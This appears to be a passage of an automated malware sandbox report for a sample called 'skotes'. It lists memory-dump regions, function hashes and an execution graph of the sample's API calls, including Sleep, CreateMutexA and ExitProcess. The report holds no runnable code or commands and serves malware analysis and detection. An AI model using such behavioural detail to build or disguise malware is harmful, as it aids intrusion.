                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                • Instruction ID: 5f3d30ab04bd70401d27262421f5984d25a5ca766789051c56856d9e2c24de20
                                                                                                                                                                • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                • Instruction Fuzzy Hash: 2DB1F2329046469FDB15CF28C881BFEBFE5EF55340F1481EAE855EB242D6B49D01CBA0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 531285432-0
                                                                                                                                                                • Opcode ID: e1c45c9dc316a54ae35defc37cb427f3777ab067037c4f36381e4a8f1e2a877e
                                                                                                                                                                • Instruction ID: 592f2f7214de587e357e006ea6b28f9e90db438ae3c0b7f788d8437b7c4a2a1a
                                                                                                                                                                • Opcode Fuzzy Hash: e1c45c9dc316a54ae35defc37cb427f3777ab067037c4f36381e4a8f1e2a877e
                                                                                                                                                                • Instruction Fuzzy Hash: E3213175A01119AFDF00EFA4DD81EBEBBB9EF08710F1000A5F501B7291DB309D059BA0

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:0.9%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:592
                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                execution_graph 9745 b89ab8 9747 b89acc 9745->9747 9748 b89b08 9747->9748 9749 b8a917 9748->9749 9750 b89b4b shared_ptr 9748->9750 9751 b8a953 Sleep CreateMutexA 9749->9751 9753 b89b59 9750->9753 9762 b85c10 9750->9762 9755 b8a98e 9751->9755 9754 b89b7c 9780 b88b30 9754->9780 9757 b89b8d 9758 b85c10 3 API calls 9757->9758 9759 b89cb1 9758->9759 9760 b88b30 3 API calls 9759->9760 9761 b89cc2 9760->9761 9763 b85c54 9762->9763 9790 b84b30 9763->9790 9765 b85d17 shared_ptr std::invalid_argument::invalid_argument 9765->9754 9766 b85c7b shared_ptr __cftof 9766->9765 9767 b85c10 3 API calls 9766->9767 9768 b866ac 9767->9768 9769 b85c10 3 API calls 9768->9769 9770 b866b1 9769->9770 9794 b822c0 9770->9794 9772 b866c9 shared_ptr 9773 b85c10 3 API calls 9772->9773 9774 b8673d 9773->9774 9775 b822c0 3 API calls 9774->9775 9776 b86757 shared_ptr 9775->9776 9777 b85c10 3 API calls 9776->9777 9778 b822c0 3 API calls 9776->9778 9779 b86852 shared_ptr std::invalid_argument::invalid_argument 9776->9779 9777->9776 9778->9776 9779->9754 9781 b88b7c 9780->9781 9782 b85c10 3 API calls 9781->9782 9783 b88b97 shared_ptr 9782->9783 9784 b88d01 shared_ptr std::invalid_argument::invalid_argument 9783->9784 9785 b85c10 3 API calls 9783->9785 9784->9757 9787 b88d9a shared_ptr 9785->9787 9786 b88e7e shared_ptr std::invalid_argument::invalid_argument 9786->9757 9787->9786 9788 b85c10 3 API calls 9787->9788 9789 b88f1a shared_ptr std::invalid_argument::invalid_argument 9788->9789 9789->9757 9792 b84ce5 9790->9792 9793 b84b92 9790->9793 9792->9766 9793->9792 9797 bb6da6 9793->9797 9906 b82280 9794->9906 9798 bb6dc2 9797->9798 9799 bb6db4 9797->9799 9798->9793 9802 bb6d19 9799->9802 9807 bb690a 9802->9807 9806 bb6d3d 9806->9793 9808 bb692a 9807->9808 9809 bb6921 9807->9809 9808->9809 9821 bba671 9808->9821 9815 bb6d52 9809->9815 9816 bb6d8f 9815->9816 9817 bb6d5f 9815->9817 9898 bbb67d 9816->9898 9818 bb6d6e 9817->9818 9893 bbb6a1 9817->9893 9818->9806 9825 bba67b __dosmaperr __freea 9821->9825 9822 bb694a 9826 bbb5fb 9822->9826 9825->9822 9834 bb8bec 9825->9834 9827 bbb60e 9826->9827 9828 bb6960 9826->9828 9827->9828 9860 bbf5ab 9827->9860 9830 bbb628 9828->9830 9831 bbb63b 9830->9831 9833 bbb650 9830->9833 9831->9833 9867 bbe6b1 9831->9867 9833->9809 9835 bb8bf1 __cftof 9834->9835 9838 bb8bfc __cftof 9835->9838 9840 bbd634 9835->9840 9854 bb65ed 9838->9854 9842 bbd640 __cftof __dosmaperr 9840->9842 9841 bbd69c __cftof __dosmaperr 9841->9838 9842->9841 9843 bbd726 9842->9843 9844 bbd751 __cftof 9842->9844 9848 bbd81b __dosmaperr 9842->9848 9843->9844 9857 bbd62b 9843->9857 9844->9841 9849 bba671 __cftof 3 API calls 9844->9849 9852 bbd7a5 9844->9852 9845 bb65ed __cftof 3 API calls 9846 bbd82e 9845->9846 9848->9845 9849->9852 9851 bbd62b __cftof 3 API calls 9851->9844 9852->9841 9853 bba671 __cftof 3 API calls 9852->9853 9853->9841 9855 bb64c7 __cftof 3 API calls 9854->9855 9856 bb65fe 9855->9856 9858 bba671 __cftof GetPEB ExitProcess GetPEB 9857->9858 9859 bbd630 9858->9859 9859->9851 9861 bbf5b7 __cftof 9860->9861 9862 bba671 __cftof 3 API calls 9861->9862 9864 bbf5c0 __cftof 9862->9864 9863 bbf606 9863->9828 9864->9863 9865 bb8bec __cftof 3 API calls 9864->9865 9866 bbf62b 9865->9866 9868 bba671 __cftof 3 API calls 9867->9868 9869 bbe6bb 9868->9869 9872 bbe5c9 9869->9872 9871 bbe6c1 9871->9833 9873 bbe5d5 __cftof __freea 9872->9873 9874 bbe5f6 9873->9874 9875 bb8bec __cftof 3 API calls 9873->9875 9874->9871 9876 bbe668 9875->9876 9877 bbe6a4 9876->9877 9881 bba72e 9876->9881 9877->9871 9885 bba739 __dosmaperr __freea 9881->9885 9882 bb8bec __cftof GetPEB ExitProcess GetPEB 9883 bba7c7 9882->9883 9884 bba7be 9886 bbe4b0 9884->9886 9885->9882 9885->9884 9887 bbe5c9 __cftof GetPEB ExitProcess GetPEB 9886->9887 9888 bbe4c3 9887->9888 9889 bbe259 __cftof GetPEB ExitProcess GetPEB 9888->9889 9890 bbe4cb __cftof 9889->9890 9891 bbe6c4 __cftof GetPEB ExitProcess GetPEB 9890->9891 9892 bbe4dc __cftof __dosmaperr __freea 9890->9892 9891->9892 9892->9877 9894 bb690a __cftof 3 API calls 9893->9894 9895 bbb6be 9894->9895 9897 bbb6ce std::invalid_argument::invalid_argument 9895->9897 9903 bbf1bf 9895->9903 9897->9818 9899 bba671 __cftof 3 API calls 9898->9899 9900 bbb688 9899->9900 9901 bbb5fb __cftof 3 API calls 9900->9901 9902 bbb698 9901->9902 9902->9818 9904 bb690a __cftof 3 API calls 9903->9904 9905 bbf1df __cftof __freea std::invalid_argument::invalid_argument 9904->9905 9905->9897 9907 b82296 9906->9907 9910 bb87f8 9907->9910 9913 bb7609 9910->9913 9912 b822a4 9912->9772 9914 bb7649 9913->9914 9918 bb7631 __cftof __dosmaperr std::invalid_argument::invalid_argument 9913->9918 9915 bb690a __cftof 3 API calls 9914->9915 9914->9918 9916 bb7661 9915->9916 9919 bb7bc4 9916->9919 9918->9912 9920 bb7bd5 9919->9920 9921 bb7be4 __cftof __dosmaperr 9920->9921 9926 bb8168 9920->9926 9931 bb7dc2 9920->9931 9936 bb7de8 9920->9936 9946 bb7f36 9920->9946 9921->9918 9927 bb8178 9926->9927 9928 bb8171 9926->9928 9927->9920 9955 bb7b50 9928->9955 9930 bb8177 9930->9920 9932 bb7dcb 9931->9932 9933 bb7dd2 9931->9933 9934 bb7b50 3 API calls 9932->9934 9933->9920 9935 bb7dd1 9934->9935 9935->9920 9937 bb7e09 __cftof __dosmaperr 9936->9937 9938 bb7def 9936->9938 9937->9920 9938->9937 9939 bb7f69 9938->9939 9941 bb7fa2 9938->9941 9944 bb7f77 9938->9944 9939->9944 9945 bb7f8b 9939->9945 9967 bb8241 9939->9967 9941->9945 9963 bb8390 9941->9963 9944->9945 9971 bb86ea 9944->9971 9945->9920 9947 bb7f69 9946->9947 9951 bb7f4f 9946->9951 9949 bb7f8b 9947->9949 9950 bb7f77 9947->9950 9952 bb8241 3 API calls 9947->9952 9948 bb7fa2 9948->9949 9953 bb8390 3 API calls 9948->9953 9949->9920 9950->9949 9954 bb86ea 3 API calls 9950->9954 9951->9947 9951->9948 9951->9950 9952->9950 9953->9950 9954->9949 9957 bb7b62 __dosmaperr 9955->9957 9959 bb8ab6 9957->9959 9958 bb7b85 __dosmaperr 9958->9930 9960 bb8ad1 9959->9960 9961 bb8868 GetPEB ExitProcess GetPEB 9960->9961 9962 bb8adb 9961->9962 9962->9958 9964 bb83ab 9963->9964 9965 bb83dd 9964->9965 9975 bbc88e 9964->9975 9965->9944 9968 bb825a 9967->9968 9978 bbd3c8 9968->9978 9970 bb830d 9970->9944 9972 bb875d std::invalid_argument::invalid_argument 9971->9972 9974 bb8707 9971->9974 9972->9945 9973 bbc88e __cftof 3 API calls 9973->9974 9974->9972 9974->9973 9976 bbc733 __cftof GetPEB ExitProcess GetPEB 9975->9976 9977 bbc8a6 9976->9977 9977->9965 9979 bbd3d8 __cftof __dosmaperr 9978->9979 9980 bbd3ee 9978->9980 9979->9970 9980->9979 9981 bbd485 9980->9981 9982 bbd48a 9980->9982 9984 bbd4ae 9981->9984 9985 bbd4e4 9981->9985 9983 bbcbdf GetPEB ExitProcess GetPEB 9982->9983 9983->9979 9987 bbd4cc 9984->9987 9988 bbd4b3 9984->9988 9986 bbcef8 GetPEB ExitProcess GetPEB 9985->9986 9986->9979 9989 bbd0e2 GetPEB ExitProcess GetPEB 9987->9989 9990 bbd23e GetPEB ExitProcess GetPEB 9988->9990 9989->9979 9990->9979 10268 b8cc79 10270 b8cc84 shared_ptr 10268->10270 10269 b8ccda shared_ptr std::invalid_argument::invalid_argument 10270->10269 10271 b85c10 3 API calls 10270->10271 10272 b8ce9d 10271->10272 10274 b8ca70 10272->10274 10275 b8cadd 10274->10275 10276 b85c10 3 API calls 10275->10276 10283 b8cc87 10275->10283 10277 b8ccf9 10276->10277 10284 b89030 10277->10284 10278 b8ccda shared_ptr std::invalid_argument::invalid_argument 10280 b85c10 3 API calls 10281 b8ce9d 10280->10281 10282 b8ca70 3 API calls 10281->10282 10283->10278 10283->10280 10285 b8907f 10284->10285 10286 b85c10 3 API calls 10285->10286 10287 b8909a shared_ptr std::invalid_argument::invalid_argument 10286->10287 10287->10283 10306 bb8bbe 10309 bb8868 10306->10309 10308 bb8bdc 10310 bb887a 10309->10310 10311 bb690a __cftof 3 API calls 10310->10311 10314 bb888f __cftof __dosmaperr 10310->10314 10313 bb88bf 10311->10313 10312 bb6d52 3 API calls 10312->10313 10313->10312 10313->10314 10314->10308 9991 b842b0 9994 b83ac0 9991->9994 9993 b842bb shared_ptr 9995 b83af9 9994->9995 9998 b83c38 9995->9998 10000 b83b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 9995->10000 10004 b832d0 9995->10004 9996 b832d0 5 API calls 10001 b83c5f 9996->10001 9998->9996 9998->10001 9999 b83c68 9999->9993 10000->9993 10001->9999 10023 b83810 10001->10023 10027 b9c6ac 10004->10027 10006 b8336b 10033 b9c26a 10006->10033 10008 b8333c __Mtx_unlock 10010 b9c26a 4 API calls 10008->10010 10013 b83350 std::invalid_argument::invalid_argument 10008->10013 10012 b83377 10010->10012 10011 b83314 10011->10006 10011->10008 10030 b9bd4c 10011->10030 10014 b9c6ac GetSystemTimePreciseAsFileTime 10012->10014 10013->9998 10015 b833af 10014->10015 10016 b9c26a 4 API calls 10015->10016 10017 b833b6 __Cnd_broadcast 10015->10017 10016->10017 10018 b9c26a 4 API calls 10017->10018 10019 b833d7 __Mtx_unlock 10017->10019 10018->10019 10020 b9c26a 4 API calls 10019->10020 10021 b833eb 10019->10021 10022 b8340e 10020->10022 10021->9998 10022->9998 10024 b8381c 10023->10024 10077 b82440 10024->10077 10037 b9c452 10027->10037 10029 b9c6b9 10029->10011 10054 b9bb72 10030->10054 10032 b9bd5c 10032->10011 10034 b9c292 10033->10034 10035 b9c274 10033->10035 10034->10034 10035->10034 10060 b9c297 10035->10060 10038 b9c4a8 10037->10038 10040 b9c47a std::invalid_argument::invalid_argument 10037->10040 10038->10040 10043 b9cf6b 10038->10043 10040->10029 10041 b9c4fd __Xtime_diff_to_millis2 10041->10040 10042 b9cf6b _xtime_get GetSystemTimePreciseAsFileTime 10041->10042 10042->10041 10044 b9cf7a 10043->10044 10046 b9cf87 __aulldvrm 10043->10046 10044->10046 10047 b9cf44 10044->10047 10046->10041 10050 b9cbea 10047->10050 10051 b9cbfb GetSystemTimePreciseAsFileTime 10050->10051 10052 b9cc07 10050->10052 10051->10052 10052->10046 10055 b9bb9c 10054->10055 10056 b9cf6b _xtime_get GetSystemTimePreciseAsFileTime 10055->10056 10059 b9bba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 10055->10059 10057 b9bbcf __Xtime_diff_to_millis2 10056->10057 10058 b9cf6b _xtime_get GetSystemTimePreciseAsFileTime 10057->10058 10057->10059 10058->10059 10059->10032 10063 b82ae0 10060->10063 10062 b9c2ae Concurrency::cancel_current_task 10070 b9bedf 10063->10070 10065 b82af4 __cftof 10065->10062 10066 bba671 __cftof 3 API calls 10065->10066 10069 bb6ccc 10066->10069 10067 bb8bec __cftof 3 API calls 10068 bb6cf6 10067->10068 10069->10067 10073 b9cc31 10070->10073 10074 b9cc3f InitOnceExecuteOnce 10073->10074 10076 b9bef2 10073->10076 10074->10076 10076->10065 10080 b9b5d6 10077->10080 10079 b82472 10081 b9b5f1 Concurrency::cancel_current_task 10080->10081 10082 bb8bec __cftof 3 API calls 10081->10082 10084 b9b658 __cftof std::invalid_argument::invalid_argument 10081->10084 10083 b9b69f 10082->10083 10084->10079 10344 b855f0 10345 b85610 10344->10345 10345->10345 10346 b822c0 3 API calls 10345->10346 10347 b85710 std::invalid_argument::invalid_argument 10345->10347 10346->10345 10348 b843f0 10349 b9bedf InitOnceExecuteOnce 10348->10349 10350 b8440a 10349->10350 10351 b84411 10350->10351 10352 bb6cbb 3 API calls 10350->10352 10353 b84424 10352->10353 10455 b83970 10456 b9c68b __Mtx_init_in_situ 2 API calls 10455->10456 10457 b839a7 10456->10457 10458 b9c68b __Mtx_init_in_situ 2 API calls 10457->10458 10459 b839e6 10458->10459 10460 b82170 10463 b9c6fc 10460->10463 10462 b8217a 10464 b9c70c 10463->10464 10465 b9c724 10463->10465 10464->10465 10467 b9cfbe 10464->10467 10465->10462 10468 b9ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10467->10468 10469 b9cfd0 10468->10469 10469->10464 10288 b84276 10289 b82410 4 API calls 10288->10289 10290 b8427f 10289->10290 9724 bb6629 9727 bb64c7 9724->9727 9728 bb64d5 __cftof 9727->9728 9729 bb6520 9728->9729 9732 bb652b 9728->9732 9731 bb652a 9738 bba302 GetPEB 9732->9738 9734 bb6535 9735 bb653a GetPEB 9734->9735 9736 bb654a __cftof 9734->9736 9735->9736 9737 bb6562 ExitProcess 9736->9737 9739 bba31c __cftof 9738->9739 9739->9734 10085 b85cad 10087 b85caf shared_ptr __cftof 10085->10087 10086 b85d17 shared_ptr std::invalid_argument::invalid_argument 10087->10086 10088 b85c10 3 API calls 10087->10088 10089 b866ac 10088->10089 10090 b85c10 3 API calls 10089->10090 10091 b866b1 10090->10091 10092 b822c0 3 API calls 10091->10092 10093 b866c9 shared_ptr 10092->10093 10094 b85c10 3 API calls 10093->10094 10095 b8673d 10094->10095 10096 b822c0 3 API calls 10095->10096 10097 b86757 shared_ptr 10096->10097 10098 b86852 shared_ptr std::invalid_argument::invalid_argument 10097->10098 10099 b85c10 3 API calls 10097->10099 10100 b822c0 3 API calls 10097->10100 10099->10097 10100->10097 10101 b820a0 10104 b9c68b 10101->10104 10103 b820ac 10107 b9c3d5 10104->10107 10106 b9c69b 10106->10103 10108 b9c3eb 10107->10108 10109 b9c3e1 10107->10109 10108->10106 10110 b9c39e 10109->10110 10111 b9c3be 10109->10111 10110->10108 10116 b9ccd5 10110->10116 10120 b9cd0a 10111->10120 10114 b9c3d0 10114->10106 10117 b9cce3 InitializeCriticalSectionEx 10116->10117 10119 b9c3b7 10116->10119 10117->10119 10119->10106 10121 b9cd1f RtlInitializeConditionVariable 10120->10121 10121->10114 10354 b83fe0 10355 b84022 10354->10355 10356 b8408c 10355->10356 10357 b840d2 10355->10357 10360 b84035 std::invalid_argument::invalid_argument 10355->10360 10361 b835e0 10356->10361 10367 b83ee0 10357->10367 10362 b83616 10361->10362 10366 b8364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 10362->10366 10373 b82ce0 10362->10373 10364 b8369e 10364->10366 10382 b82c00 10364->10382 10366->10360 10368 b83f48 10367->10368 10370 b83f1e 10367->10370 10369 b82c00 3 API calls 10368->10369 10371 b83f58 10368->10371 10372 b83f7f 10369->10372 10370->10360 10371->10360 10372->10360 10374 b82d1d 10373->10374 10375 b9bedf InitOnceExecuteOnce 10374->10375 10376 b82d46 10375->10376 10377 b82d88 10376->10377 10378 b82d51 std::invalid_argument::invalid_argument 10376->10378 10389 b9bef7 10376->10389 10380 b82440 3 API calls 10377->10380 10378->10364 10381 b82d9b 10380->10381 10381->10364 10383 b82c0e 10382->10383 10402 b9b847 10383->10402 10385 b82c42 10386 b82c49 10385->10386 10408 b82c80 10385->10408 10386->10366 10388 b82c58 Concurrency::cancel_current_task 10390 b9bf03 Concurrency::cancel_current_task 10389->10390 10391 b9bf6a 10390->10391 10392 b9bf73 10390->10392 10396 b9be7f 10391->10396 10394 b82ae0 4 API calls 10392->10394 10395 b9bf6f 10394->10395 10395->10377 10397 b9cc31 InitOnceExecuteOnce 10396->10397 10399 b9be97 10397->10399 10398 b9be9e 10398->10395 10399->10398 10400 bb6cbb 3 API calls 10399->10400 10401 b9bea7 10400->10401 10401->10395 10403 b9b854 10402->10403 10407 b9b873 Concurrency::details::_Reschedule_chore 10402->10407 10411 b9cb77 10403->10411 10405 b9b864 10405->10407 10413 b9b81e 10405->10413 10407->10385 10409 b9b7fb TpReleaseWork 10408->10409 10410 b82cb2 shared_ptr 10409->10410 10410->10388 10412 b9cb92 CreateThreadpoolWork 10411->10412 10412->10405 10414 b9b827 Concurrency::details::_Reschedule_chore 10413->10414 10417 b9cdcc 10414->10417 10416 b9b841 10416->10407 10418 b9cde1 TpPostWork 10417->10418 10418->10416 10438 b84120 10439 b8416a 10438->10439 10440 b83ee0 3 API calls 10439->10440 10441 b841b2 Concurrency::details::_ContextCallback::_CallInContext std::invalid_argument::invalid_argument 10439->10441 10440->10441 10320 b89ba5 10321 b89ba7 10320->10321 10322 b85c10 3 API calls 10321->10322 10323 b89cb1 10322->10323 10324 b88b30 3 API calls 10323->10324 10325 b89cc2 10324->10325 10486 b8215a 10487 b9c6fc InitializeCriticalSectionEx 10486->10487 10488 b82164 10487->10488 10185 b89adc 10186 b89aea shared_ptr 10185->10186 10187 b8a917 10186->10187 10190 b89b4b shared_ptr 10186->10190 10188 b8a953 Sleep CreateMutexA 10187->10188 10189 b8a98e 10188->10189 10191 b85c10 3 API calls 10190->10191 10192 b89b59 10190->10192 10193 b89b7c 10191->10193 10194 b88b30 3 API calls 10193->10194 10195 b89b8d 10194->10195 10196 b85c10 3 API calls 10195->10196 10197 b89cb1 10196->10197 10198 b88b30 3 API calls 10197->10198 10199 b89cc2 10198->10199 10326 b83f9f 10327 b83fad 10326->10327 10329 b83fb6 10326->10329 10328 b82410 4 API calls 10327->10328 10328->10329 10330 b82b90 10331 b82bce 10330->10331 10334 b9b7fb 10331->10334 10333 b82bdb shared_ptr std::invalid_argument::invalid_argument 10335 b9b817 10334->10335 10336 b9b807 10334->10336 10335->10333 10336->10335 10338 b9ca78 10336->10338 10339 b9ca8d TpReleaseWork 10338->10339 10339->10335 10442 b9d111 10443 b9d122 10442->10443 10444 b9d12a 10443->10444 10446 b9d199 10443->10446 10447 b9d1a7 SleepConditionVariableCS 10446->10447 10449 b9d1c0 10446->10449 10447->10449 10449->10443 10450 b82b10 10451 b82b1a 10450->10451 10452 b82b1c 10450->10452 10453 b9c26a 4 API calls 10452->10453 10454 b82b22 10453->10454 9740 b8a856 9741 b8a870 9740->9741 9744 b8a892 shared_ptr 9740->9744 9742 b8a953 Sleep CreateMutexA 9741->9742 9741->9744 9743 b8a98e 9742->9743 10122 b83c8e 10123 b83c98 10122->10123 10127 b83ca5 10123->10127 10130 b82410 10123->10130 10125 b83810 3 API calls 10126 b83ccf 10125->10126 10128 b83810 3 API calls 10126->10128 10127->10125 10129 b83cdb shared_ptr 10128->10129 10131 b82424 10130->10131 10134 b9b52d 10131->10134 10142 bb3aed 10134->10142 10136 b9b5a5 